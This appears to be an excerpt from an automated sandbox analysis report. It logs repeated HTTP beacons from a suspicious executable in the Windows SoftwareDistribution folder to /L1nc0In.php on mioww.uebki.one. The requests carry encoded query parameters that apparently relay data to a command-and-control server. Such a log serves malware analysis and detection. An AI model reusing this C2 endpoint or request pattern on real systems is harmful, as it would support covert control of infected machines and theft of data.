                              Aug 31, 2024 10:13:41.921751976 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:42.664119959 CEST725INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:42 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pkiX3d9TcLe2Z2%2B6Cmzy54SihAlcpAo4ojXXPjZsIIAxDD8kKgBdcOsS0XKZRzga7GcwoA%2FfJ4gq9fBrTsubDjZ1UglJKU2VpJftgBayYrqnopoo31ieivcDxZit7C8dmmg%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90138d430c86-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              22192.168.2.449759188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:47.673547029 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:13:48.417118073 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:48 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=z1wPUyNXEQnNZFRpcI9ibc4uhp6BSsNvgKTGGqyS0%2F1mKFBw08yd94T4XhVxPXQqo1%2BgVhy%2F2iteCU6Sdb5jBReswApipQR4l%2Byq0xlv7nMupuFX90rjivJBH3VPyMcrm3c%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90378bcf41fb-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              23192.168.2.449760188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:53.443692923 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:54.173933029 CEST727INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:54 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYVrft9me4oQ36dRlcPMJIFyZDx%2FIxDBt55FUtqhdG%2FdUbRfw7B9k7DRbJJUiwSWPV8Qefh3iW%2BEeyF7DLZjLUcImDGpCTNCS23TCs6pKlSZ6RAjwuO2Xr61HR3Zf0nsszU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb905b89ad43d7-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              24192.168.2.449761188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:13:59.189524889 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:13:59.916388988 CEST725INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:13:59 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BL%2BxqSV0jNNJdz35ewBQQ2SrDhFEbtEOp%2BhcLc2hNckl7KpmxAqOTHqp73BlF1TB3XtdEl2LqB65E6xPjIEhoIPVJhTouCjGfCsR8EF3K6Rk9djm47c3mXXO8nWfJkndgFU%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb907f89a64343-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              25192.168.2.449762188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:04.937145948 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:05.668186903 CEST727INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:05 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Bz6izVlXPDf%2BY57LPp9bG32W2VyQklhQYphI1a8pWUJqzb4wJRuumcIBpdt%2FaCYu2Mn8R9AwBSJD1ekC8YUVXCCTGRRnv7McfEjI2wL9rmvFPy5zNT29OtgU9FWI9Ca%2BWU8%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90a35cd41a2c-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              26192.168.2.449763188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:10.686887980 CEST2131OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Connection: Keep-Alive
                              Aug 31, 2024 10:14:11.483720064 CEST729INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:11 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZnEzaSeKdpV%2BQ857Er3vT4b2uL47HaySEg2o40D3mpSYtKKOnvB8OPEsg6fyR5dEnSMQFB5WqItYjKm9ZV%2FDcOIlGt5bBWLoNPs%2Fa1L11t30CcrTHOBOOg%2FdV1BHYjFz9xY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90c7afc441ba-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              27192.168.2.449764188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
                              Aug 31, 2024 10:14:16.505985975 CEST2107OUTGET /L1nc0In.php?QsfKvOP=TXQgCyjYJFryhCsJ4&90d447cfe691122545c39016b7ab78f9=4E2NmZDZlJDM2YWOkFTOzADOlRmZyIjNlJ2YkNjYlNTNzUWOyEGZmVTM0IzN3ETN1QTO1UTN&5690ae1271d74814e0008b34a8c960fd=wM1EDMzY2MzkDNmR2NhBDZyAzN2kTOyAzY5gDN4YDZiV2N5MmYlZTY&639581f8a680a8ebd5b9e74972d1a43d=d1nI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2Yis3W&84ccbc5ddc4286bb9be5ede77b20cbca=0VfiIiOiQ2YyQ2MmNzYzMmZ4czM5gTY1QWZhJDNkhTMzMTNmNmYiwiI5cjYhJzNiZDM4YGMyImM4EGMjNzY5MmYxQWOwQjMmhTNwUTNkdjM0IiOiETMiRDZkNjZiFjYzgDNwUzM3cTYxQTYkR2M1QTOyUWYiwiI1ADOlVDMwIGOmNWM1EDZwETOkJzM4EWOzImMjlDZ5IWY0IzNiFWYyIiOiUTOkR2MhBjN1IWZykDZ4IzMhlDZwAjZyYmZyUzN4M2YisHL9JCMY5kNJNEZxkzVaRHbHZ1dWdlWz5EbJNXS5pVdsd0YsZ1RiRlSp9UaNhFZwY0RkRFbIRGcahVYw40VRl2dplUeWJjWoVzVZ5kQTJGaKNjW2pESVl2bql0M5ckW1xmMWVlTVFVa3lWSPpUaPlGMXllaKdlWY5EWhl2dplkWKl2TpVVbiZHaHNmdKNTWwFDMjBnSDxUarlmYzkTbiJXNXZ1bBlmYzkTbiJXNXZVavpWSsFzVZ9kVG [TRUNCATED]
                              Accept: */*
                              Content-Type: text/javascript
                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                              Host: mioww.uebki.one
                              Aug 31, 2024 10:14:17.249116898 CEST723INHTTP/1.1 200 OK
                              Date: Sat, 31 Aug 2024 08:14:17 GMT
                              Content-Type: text/html; charset=UTF-8
                              Transfer-Encoding: chunked
                              Connection: keep-alive
                              CF-Cache-Status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LEQcmhnpGuSdsv3CmdjSPpYtnzP5AsyV7NtMQ4OKBc7FXGaNf3oCQiwY1sxhW8l5zmJ5U118FNLpkGX9n1wnm8awTFc7HcaiqNMbu0aQj7f27L5ne%2B6MjtJW0MLvOTZmIxQ%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              X-Content-Type-Options: nosniff
                              Server: cloudflare
                              CF-RAY: 8bbb90ebbdb832e8-EWR
                              alt-svc: h3=":443"; ma=86400
                              Data Raw: 36 38 0d 0a 3d 3d 51 66 39 4a 69 49 36 49 79 4e 34 51 57 5a 34 4d 47 4f 79 55 32 59 31 49 54 5a 7a 49 32 59 31 4d 6d 4e 6c 4a 44 4e 33 55 54 4d 78 59 32 4d 79 4d 32 59 31 49 79 65 36 49 69 5a 6c 46 44 4f 33 51 54 4e 32 59 57 5a 35 4d 6d 4e 68 4a 47 4d 30 63 7a 4e 32 55 6a 59 77 6b 6a 5a 30 67 54 4e 35 67 54 4e 31 49 79 65 0d 0a 30 0d 0a 0d 0a
                              Data Ascii: 68==Qf9JiI6IyN4QWZ4MGOyU2Y1ITZzI2Y1MmNlJDN3UTMxY2MyM2Y1Iye6IiZlFDO3QTN2YWZ5MmNhJGM0czN2UjYwkjZ0gTN5gTN1Iye0


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              28192.168.2.449765188.114.97.3807632C:\Windows\SoftwareDistribution\jnTUlYyDyuybgXdgxhTkT.exe
                              TimestampBytes transferredDirectionData
